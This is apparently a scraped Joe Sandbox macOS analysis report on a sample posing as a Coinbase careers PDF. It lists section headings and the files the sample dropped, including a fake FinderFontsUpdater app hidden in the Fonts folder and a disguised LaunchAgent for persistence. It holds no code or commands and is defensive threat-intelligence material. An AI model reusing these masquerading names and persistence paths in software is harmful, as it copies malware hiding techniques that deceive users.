
Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Signature Similarity

Similar Samples

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/Users/drew/Library/Fonts/Coinbase_online_careers_2022_07.pdf

/Users/drew/Library/Fonts/Finder

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Info.plist

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/PkgInfo

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Resources/en.lproj/Credits.rtf

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Resources/en.lproj/InfoPlist.strings

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Resources/en.lproj/MainMenu.nib/keyedobjects-101300.nib

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Resources/en.lproj/MainMenu.nib/keyedobjects.nib

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/_CodeSignature/CodeResources

/Users/drew/Library/Fonts/fontsupdater_

/Users/drew/Library/Fonts/safarifontsagent

/Users/drew/Library/Fonts/safarifontsagent_

/Users/drew/Library/LaunchAgents/com.safari.fontsyncagent.plist

/dev/null

/private/var/folders/mw/_t374r4n1hz_ph6rs1f42z2r0000gn/C/com.apple.Preview/com.apple.Preview/com.apple.metal/16777237_9765376/functions.list

/private/var/folders/mw/_t374r4n1hz_ph6rs1f42z2r0000gn/C/com.apple.Preview/com.apple.Preview/com.apple.metal/31001/libraries.list

Static File Info

General

CodeSign Information

Static Mach Info

macOS Analysis Report
extractor